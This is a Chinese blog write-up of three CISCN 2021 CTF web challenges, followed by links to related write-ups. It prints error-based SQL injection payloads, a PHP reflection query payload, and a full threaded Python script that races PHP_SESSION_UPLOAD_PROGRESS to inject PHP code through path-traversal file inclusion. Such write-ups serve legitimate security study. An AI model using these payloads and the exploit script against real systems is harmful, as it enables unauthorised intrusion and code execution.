2021年 CISCN writeup

最新推荐文章于 2024-05-09 14:28:40 发布
最新推荐文章于 2024-05-09 14:28:40 发布
阅读量1k 收藏
点赞数
分类专栏: 网络空间安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43085611/article/details/116898821
版权
本文详细介绍了在2021年CISCN比赛中遇到的SQL注入和源码泄露问题,以及如何利用这些漏洞获取flag。在easy_sql部分,通过手动测试和payload构造,成功从数据库中提取出flag。在easy_source部分,利用反射机制读取了隐藏的源码,并从中找到flag。在middle_source部分,通过扫描目录,结合phpinfo信息,利用PHP_SESSION_UPLOAD_PROGRESS实现文件包含,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2021年 CISCN writeup

文章目录

1.1 easy_sql

进行手动测试,发现可以进行报错注入。Payload 为:

') AND updatexml(1, concat(0x7e, (database()), 0x7e), 1)--

尝试读取数据库表的表名,发现information关键字被过滤,猜了一下表名为 fl4g、flag,最后确定表名为 flag。

使用 join 爆出字段名。

select*from (select * from flag as a join flag b)c
select*from (select * from flag as a join flag b using(id,`no`))c
select*from (select * from flag as a join flag b using(id,`no`,`29023c0e-87b4-4f21-9ba3-f515c88243e2`))c

使用 group 语句查询 flag

SELECT group_concat(`29023c0e-87b4-4f21-9ba3-f515c88243e2`) from flag

CISCN{pN9yX-L8msl-YA6OI-WZ5QG-m,只获得了一半的 flag。

尝试绕过截断。

select substr((SELECT group_concat(`29023c0e-87b4-4f21-9ba3-f515c88243e2`) from flag), 30, 60)

-m7DeE-},获得另一半的 flag。

最后拼接得到flag为:CISCN{pN9yX-L8msl-YA6OI-WZ5QG-m7DeE-}

1.2 easy_source

通过扫描目录,发现.index.php.swo泄漏源码。

发现和fslh-writeup题目非常相似,尝试利用 PHP 内置类中的 ReflectionMethod 来读取 User 类里面各个函数的注释。

最后发现flag也是在q函数的注释中,payload为:?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

1.3 middle_source

扫描目录可以发现文件 .listing,在 you_can_seeeeeeee_me.php 路径中可以看到 phpinfo 的信息。

通过 phpinfo 中给出的 session 地址,和首页进行任意文件包含,可以联想到利用PHP_SESSION_UPLOAD_PROGRESS 进行文件包含。

参考文章《利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含》完成 expoit

#-*-coding:utf-8-*-
import threading
import requests
import io
import sys

url="http://121.36.31.240:24071/"
COUNT = 0

file = io.BytesIO(b'a' * 1024 * 50)

def Run(threads_name):
    global COUNT
    read_value = COUNT

    resp = requests.post(
    url=url,
    data={
        'PHP_SESSION_UPLOAD_PROGRESS': '<?php echo "slug01sh";print_r(scandir("/etc/geecbbgagc/adbjhijbed/fhbccehdff/bafebihfee/efbdacbhae")); ?>', # session内容
        'cf':'../../../../../../var/lib/php/sessions/ieadabjdfh/sess_flag', # 文件名称
        '':''
        }, # !
    files={'file': ('a.txt', file)}, 
    cookies={"PHPSESSID": "flag"}, # ! PHPSESSID
    )
    if 'slug01sh' in resp.text:
        print(resp.text)
        sys.exit(0)

    print("COUNT in Thread-%s is %d" % (str(threads_name), read_value))
    COUNT = read_value + 1

def main():
    threads = []
    for j in range(200):
        t = threading.Thread(target=Run,args=(j,))
        threads.append(t)
        t.start()
    for i in range(len(threads)):
        threads[i].join()
    print("Finally, The COUNT is %d" % (COUNT,))

if __name__ == '__main__':
    main()

在 data 的 PHP_SESSION_UPLOAD_PROGRESS 字段写入需要执行的代码,最后读到 flag 位于 /etc/geecbbgagc/adbjhijbed/fhbccehdff/bafebihfee/efbdacbhae,文件名为 fl444444g。

利用 index.php 的任意文件读取,即可得到 flag。

[CISCN 2021] 部分 write up
Anton__1的博客
05-16 1143
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
2021国赛CISCN 初赛 部分RE writeup
weixin_45803474的博客
09-14 470
glass 题目名称:glass 题目描述:Reverse sign in,flag形式为"CISCN{XXXXX}" 首先查看apk 界面如下 用AndroidKiller打开,反编译成java源码 这里只是声明了一下checkflag函数 要去native-lib里找 分析\glass\Project\lib\armeabi-v7a中的libnative-lib.so IDA打开 怀疑是RC4加密 参考 https://www.cnblogs.com/SunsetR/p/12247041.html
[CISCN 2021 华南赛区]rsa Writeup
bestkasscn的博客
05-16 940
[CISCN 2021 华南赛区]rsa 题目描述 from flag import text,flag import md5 from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime assert md5.new(text).hexdigest() == flag[6:-1] msg1 = text[:xx] msg2 = text[xx:yy] msg3 = text[yy:] msg1 = bytes_to_long(
CISCN2021初赛WriteUp
Hellsegamosken
05-19 1167
第一次打 ctf,啥也没学,赛前一道题没做过,了解了下 IDA 的使用就上了。 glass 200 分 reverse,安卓逆向,.apk 改 .zip 解压,classes.dex 转 classes.jar 后打开,找到 MainActivity 开始读代码。 发现调用了 public native boolean checkFlag(String paramString); 这样一个函数,但这个函数并没有写出来。搜了一下 native 关键字,发现是用来调用本地 C 代码的。然后在 glass\li
ciscn_2019_c_1 Writeup
Calllin的博客
05-06 669
ciscn_2019_c_1 Writeup 前提 本程序防御策略 >checksec ./cisscn_2019_c_1 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 本程序逻辑是输入一个字符串,按照内置加密函数逻辑加密转化为密文。但在加密函数中存在溢出漏洞。 存在strlen()函数。使用
2021[CISCN]write-up
weixin_44345014的博客
05-16 533
2021[CISCN]write-up 一、crypto 1、rsa from flag import text,flag import md5 from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime assert md5.new(text).hexdigest() == flag[6:-1] msg1 = text[:xx] msg2 = text[xx:yy] msg3 = text[yy:] msg1 = bytes
2021强网杯Writeup--by Nu1L Team.pdf
06-15
标题和描述所涉及的知识点有:“2021强网杯Writeup--by Nu1L Team.pdf”,“第五届‘强网杯’全国网络安全挑战赛”以及标签“CTF 网络安全 信息安全”。这些信息共同指向一个全国性的网络安全竞赛和Nu1L团队提交的...
GKCTF2021-官方WriteUp.pdf
07-06
【标题】:GKCTF2021-官方WriteUp.pdf 【描述】:GKCTF2021-官方WriteUp.pdf 【标签】:wp writeup 这些标题和描述表明,文件是一份关于GKCTF2021(一个网络安全竞赛,CTF代表Capture The Flag)的官方攻略...
2021CTF Writeup解题报告总结
标题“CTF-Writeups-2021”指代了一组关于2021CTF比赛的解答文档。从描述“3月6日,世界标准时间20:00 — 3月8日,世界标准时间22:00”我们可以推测,这场比赛在2021的这个时间段内进行,持续时间大约为两天。 ...
2024 高校网络安全管理运维赛 -实践能力赛项Writeup(algorithm部分解析)
最新发布
weixin_39435784的博客
05-09 489
2024 高校网络安全管理运维赛 -实践能力赛项Writeup(algorithm部分解析)
ciscn_2021_pwny.zip
05-17
2021全国大学生信息安全竞赛pwn题。
WP-CISCN2021
热门推荐
ce666666的博客
06-14 1万+
前言 这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。 Web 简单的注入 一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。 还是得靠sqlmap注入 Payload: 爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs 爆表:sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名
[CISCN2021 Quals]upload
shinygod的博客
05-06 999
在这里插入代码片 upload.php,中限制了图片的大小,长宽,以及一些字母。 <?php #Quals]upload if (!isset($_GET["ctf"])) { highlight_file(__FILE__); die(); } if(isset($_GET["ctf"])) $ctf = $_GET["ctf"]; if($ctf=="upload") { if ($_FILES['postedFile']['size'] > 1024
StarCTF2021-MISC-Writeup
末初 · mochu7
01-20 1269
文章目录signinMineGamelittle trickspuzzleFeedback signin Welcome to *CTF 2021, join telegram to get flag: https://t.me/starCTF *CTF{we1c0me_to_the_starCTF2021~} MineGame If you love reverse, you can try it, otherwise, you must finish it as quickly as pos
2021湖北省工匠杯预赛WriteUP
tangshuangsss的专栏
08-19 817
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介第一次参加CTF比赛目前预赛已经完结,预赛有6道题由于本人太菜只做出4道,感觉进决赛应该没有问题,...
2021全国大学生信息安全大赛[CISCN]web部分复现
1ance's blog
05-18 1580
目录Webeasysqleasy_source Web easysql 太菜了。。一道注入搞了半天也没整出来离谱的很。。 先是想着sqlmap跑一下,结果发现是sqllabs的数据库,发现flag表,心中暗想不会吧不会吧这就出来了??接下去,才发现是我太轻了。flag表里啥就一个id字段,其他的啥也没跑出来,离谱啊。。 只能手工测测了。发现有报错注入,但是information被过滤了,查不了列名,然后想着用时间盲注,跑出列名,最后跑出来flag(那一刻是超爽)。。。。但是提交错误(心态炸裂),然后开始检
[Writeup]2021强网拟态 Give_me_your_0day
feng的博客
10-29 594
前言 当时没能做出来,当时想到了mysql恶意服务端读取文件,但是没能读成功,不知道是为什么。今天看到Firebasky师傅的github更新了writeup,也是学习了一波。 解法1 当时没有拿Seay去扫,单纯的自己肉眼审install.php。自己审这种前后端没有分离的代码,只会去看不涉及到前端的PHP代码,就出了问题,遗漏了漏洞。 拿Seay扫一下第一条就能扫到,install.php608行的这个文件包含漏洞: <?php requir
170709 逆向-CISCN总结
whklhhhh的博客
07-10 1131
1625-5 王子昂 总结《20177月9日》 【连续第280天总结】  A. CISCN B. 一整天都投入进去还是非常充实的,虽然几个同学一起想MISC却一道都没做出来,这种经历却是特别有趣 MISC方面大家的积攒都不够,开脑洞基本上能过一些小关,但是面对真正的题目就寸步难行了 这既是成长的过程也是提醒我们抓紧时间锻炼各方面知识 个人的逆向方面比较受挫。今的逆向不同以往,大量
第15届全国大学生知识竞赛场景实操 2022ciscn初赛 部分writeup
mumuzi的博客
05-29 1万+
Misc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值